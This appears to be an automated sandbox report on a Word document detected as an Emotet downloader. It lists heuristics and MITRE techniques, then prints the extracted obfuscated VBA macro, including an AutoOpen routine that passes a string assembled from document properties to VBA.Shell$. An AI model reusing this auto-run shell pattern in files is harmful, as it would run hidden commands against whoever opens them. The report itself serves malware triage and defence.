Verdict: MALICIOUS
Risk Score: 172
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6344335-3, indicating it's likely an Emotet variant. The presence of VBA macros, specifically an AutoOpen macro and a potential Shell call, strongly suggests the document is designed to execute malicious code upon opening. The extracted 'macros.bas' file contains obfuscated VBA code that likely attempts to download and execute a secondary payload, a common Emotet behavior.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6344335-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  Public Function BCncMKeTaxu() VBA.Shell$ "" + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.CustomDocumentProperties("TxBGeUh") + ActiveDocument.CustomDocumentProperties("hFsnTsFUk") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.BuiltInDocumentProperties("Comments") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa … End Function
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Sub autoopen() BCncMKeTaxu
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7108 bytes |

SHA-256: ed89a80f04b4a4384a6db290d32aa512431d9ea6740312bccbbc86d20e8d291a

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 131 of 173 identifiers look randomly generated (e.g. 'PKEYbTkxHTD'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Function wTVpCSRLX() As Integer
bNEEvYMWr = 9514
wcsHSgHhWXh = FVaBsNbDDxw
dtFSuVmwrvA = Asc(wcsHSgHhWXh)
If bNEEvYMWr > dtFSuVmwrvA Then
For wrpwYPVpB = 1131 To 6113
WuhbnYaxkGL = dtFSuVmwrvA + wrpwYPVpB
Next wrpwYPVpB
WuhbnYaxkGL = WuhbnYaxkGL + bNEEvYMWr
kevDzeFwG = CStr(WuhbnYaxkGL)
nvsuRhyKPE = Mid(kevDzeFwG, 2130, 6508)
KewtFsuKPTz = KewtFsuKPTz & "2258"
wTVpCSRLX = CInt(Mid(KewtFsuKPTz, 261, 6996))
Else
wTVpCSRLX = 7500 + 2302 + 5819 + 9753 / 2043 / 9584 - 295 - 7268 + 7230 + 1474
MsgBox ("wSTYeuckPL")
MsgBox ("UbHpYnaE")
End Function
Public Function MPsKUhbu() As Integer
pErVzdn = 2755
ggpRdRD = yXbUEyN
sBSPUDUHbx = Asc(ggpRdRD)
If pErVzdn > sBSPUDUHbx Then
For dycwZXp = 2055 To 8483
sxwVmsGTKRx = sBSPUDUHbx + dycwZXp
Next dycwZXp
sxwVmsGTKRx = sxwVmsGTKRx + pErVzdn
cDEnVSdgvWt = CStr(sxwVmsGTKRx)
DrXXkmBU = Mid(cDEnVSdgvWt, 225, 5795)
amWWBEwAR = amWWBEwAR & "9807"
MPsKUhbu = CInt(Mid(amWWBEwAR, 1860, 6056))
Else
MPsKUhbu = 6394 + 2439 + 3194 + 2107 / 8680 / 7193 / 9103 - 1432 - 7425 - 146 + 4046 + 6979
MsgBox ("fMnNbfGeHZu")
MsgBox ("UBauMpw")
End Function
Public Function GsYuuBuzg() As Integer
WYVHnRywDS = 2046
DDHYwXzn = VeHvXHxawTt
vVgHdNRdRST = Asc(DDHYwXzn)
If WYVHnRywDS > vVgHdNRdRST Then
For sXKxStht = 2599 To 6328
pXhmeHd = vVgHdNRdRST + sXKxStht
Next sXKxStht
pXhmeHd = pXhmeHd + WYVHnRywDS
NDGzWPya = CStr(pXhmeHd)
gehgMsxLupy = Mid(NDGzWPya, 1388, 7987)
ERbCvufCUH = ERbCvufCUH & "8767"
GsYuuBuzg = CInt(Mid(ERbCvufCUH, 2906, 9748))
Else
GsYuuBuzg = 9370 + 3397 + 1416 + 3417 / 6883 / 7289 / 6733 - 1094 - 9166 - 1951 + 373 + 87 + 7652
MsgBox ("eGRfWBVPHuM")
MsgBox ("EESugLNkCfC")
MsgBox ("ZgRdcEXDfgC")
MsgBox ("tKAwFfzy")
MsgBox ("btcUxDyFnLE")
End Function
Public Function rPVYKCCpe() As Integer
WSKeXvvzG = 64
GuzZCtvS = fDEPkSf
UFUtFETUWZh = Asc(GuzZCtvS)
If WSKeXvvzG > UFUtFETUWZh Then
For NNVFFhf = 2158 To 6664
vpBTwZnWyMp = UFUtFETUWZh + NNVFFhf
Next NNVFFhf
vpBTwZnWyMp = vpBTwZnWyMp + WSKeXvvzG
fTNcdHtY = CStr(vpBTwZnWyMp)
pwBtKGV = Mid(fTNcdHtY, 3228, 9610)
yAMnFfvvP = yAMnFfvvP & "330"
rPVYKCCpe = CInt(Mid(yAMnFfvvP, 158, 6624))
Else
rPVYKCCpe = 2702 + 7214 + 2627 + 5003 / 7758 / 9788 - 1224 - 7363 - 2881 + 3271 + 4672 + 6385
MsgBox ("rpmCTxPTge")
MsgBox ("zLTnNPVA")
MsgBox ("SzngFZNf")
MsgBox ("gnhTfTGgr")
MsgBox ("beuDhtz")
MsgBox ("TRFAbAmUX")
End Function
Public Function gyWvDvBX() As Integer
cmmPAVsE = 9299
ynnDxng = vuZwYgsgNh
hXaBVGczBp = Asc(ynnDxng)
If cmmPAVsE > hXaBVGczBp Then
For hDkgwdfE = 1906 To 5177
PXwKSKsDV = hXaBVGczBp + hDkgwdfE
Next hDkgwdfE
PXwKSKsDV = PXwKSKsDV + cmmPAVsE
cXnrdYv = CStr(PXwKSKsDV)
dWXPNxNwXBf = Mid(cXnrdYv, 1163, 3484)
PhYHrKxGX = PhYHrKxGX & "4249"
gyWvDvBX = CInt(Mid(PhYHrKxGX, 3298, 5188))
Else
gyWvDvBX = 7016 + 303 + 8962 + 1152 / 7157 / 4903 / 5452 - 112 - 4651 + 5503 + 4220 + 6480
MsgBox ("tdCeLpeNp")
MsgBox ("xNEyDAZ")
MsgBox ("mxhGNTfzK")
MsgBox ("tagtvPXw")
End Function
Sub autoopen()
BCncMKeTaxu
End Sub
Public Function BCncMKeTaxu()
VBA.Shell$ "" + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.CustomDocumentProperties("TxBGeUh") + ActiveDocument.CustomDocumentProperties("hFsnTsFUk") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.BuiltInDocumentProperties("Comments") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + uHUptErR, 0
End Function
Public Function GsDHVshxKud() As Integer
VkDxdUGHd = 5959
MwNadAG = xcBSBvVnFz
BEGUcSDmaLC = Asc(MwNadAG)
If VkDxdUGHd > BEGUcSDmaLC Then
For rtgkUtP = 2800 To 8534
aDLYMTTVATe = BEGUcSDmaLC + rtgkUtP
Next rtgkUtP
aDLYMTTVATe = aDLYMTTVATe + VkDxdUGHd
CczAcxeE = CStr(aDLYMTTVATe)
TBzwSHWSzb = Mid(CczAcxeE, 1725, 7972)
rFdfKsZa = rFdfKsZa & "8635"
GsDHVshxKud = CInt(Mid(rFdfKsZa, 430, 8132))
Else
GsDHVshxKud = 4361 + 2883 + 4888 + 2028 / 2763 / 4269 - 1023 - 1923 - 3123 + 2721 + 2605
MsgBox ("pbWFBUAKZe")
MsgBox ("XKukAYMzvhe")
MsgBox ("ChRSstzDXd")
MsgBox ("SGZTKyRRK")
MsgBox ("achVAZw")
End Function
Public Function nhULBwBdMeR() As Integer
ytsbzCnNPbv = 4868
EwSZkvv = wbLadYXRPM
vfNctwrZbfV = Asc(EwSZkvv)
If ytsbzCnNPbv > vfNctwrZbfV Then
For CTmDrDAAsr = 1438 To 6507
hUBcmYH = vfNctwrZbfV + CTmDrDAAsr
Next CTmDrDAAsr
hUBcmYH = hUBcmYH + ytsbzCnNPbv
UezEXxwk = CStr(hUBcmYH)
aAYNhYHfd = Mid(UezEXxwk, 1962, 5840)
zYuYHXfDuCG = zYuYHXfDuCG & "190"
nhULBwBdMeR = CInt(Mid(zYuYHXfDuCG, 243, 7589))
Else
nhULBwBdMeR = 7193 + 9570 + 6590 / 7314 / 3478 - 7894 - 1490 - 5804 + 3907 + 8456
MsgBox ("KteLXEVXdbM")
MsgBox ("vapGeUVC")
MsgBox ("ustFNGaS")
MsgBox ("seSLRLKeUNF")
End Function
Public Function aRrLexffA() As Integer
AfHLdgZ = 6836
PKEYbTkxHTD = EcPVuzRkAX
TxygkYyd = Asc(PKEYbTkxHTD)
If AfHLdgZ > TxygkYyd Then
For RZwUpKL = 516 To 3630
rHmzkVn = TxygkYyd + RZwUpKL
Next RZwUpKL
rHmzkVn = rHmzkVn + AfHLdgZ
BPHLtuuBZ = CStr(rHmzkVn)
YyykvLyyFpV = Mid(BPHLtuuBZ, 1309, 8350)
EAdtxRbE = EAdtxRbE & "9626"
aRrLexffA = CInt(Mid(EAdtxRbE, 2351, 8481))
Else
aRrLexffA = 815 + 1327 + 9410 / 3255 / 5629 / 1741 - 4361 - 5031 + 1968 + 8820
MsgBox ("CDLLpLs")
MsgBox ("eacZhfKdmHf")
MsgBox ("MDhnSmf")
MsgBox ("StMBApVxvpL")
MsgBox ("wGLUMVy")
End Function
Public Function YVctbxa() As Integer
FCrKRncB = 7116
uRuFZmhKz = VMXUmTc
KSeKMmm = Asc(uRuFZmhKz)
If FCrKRncB > KSeKMmm Then
For WZXaLWcS = 678 To 6175
WfRhYBK = KSeKMmm + WZXaLWcS
Next WZXaLWcS
WfRhYBK = WfRhYBK + FCrKRncB
GPHXPCW = CStr(WfRhYBK)
tTWGLMG = Mid(GPHXPCW, 1001, 5730)
FKTMFuNvhW = FKTMFuNvhW & "2209"
YVctbxa = CInt(Mid(FKTMFuNvhW, 1137, 7816))
Else
YVctbxa = 7539 + 2339 + 3932 + 648 / 4442 / 565 / 6384 - 9198 - 7174 - 4909 + 1953 + 6064
MsgBox ("UeHzBykbt")
MsgBox ("WFsgAvBp")
MsgBox ("faKgeBzk")
End Function
Public Function HhKvhZnVZWT() As Integer
wfrnunDztu = 1024
KfGhpNZWZ = XwRtaUTSmh
hyMvXFGPLbY = Asc(KfGhpNZWZ)
If wfrnunDztu > hyMvXFGPLbY Then
For TrmREeyX = 1489 To 7192
ngHPYYTbcEw = hyMvXFGPLbY + TrmREeyX
Next TrmREeyX
ngHPYYTbcEw = ngHPYYTbcEw + wfrnunDztu
BeZSZaWdT = CStr(ngHPYYTbcEw)
DwKVDdw = Mid(BeZSZaWdT, 1966, 4407)
nGfeMzpHU = nGfeMzpHU & "8134"
HhKvhZnVZWT = CInt(Mid(nGfeMzpHU, 1897, 8959))
Else
HhKvhZnVZWT = 5348 + 7196 + 7324 + 7843 / 2858 / 8464 - 1654 - 7082 - 5688 + 5362 + 6943
MsgBox ("xXuatBNvDm")
End Function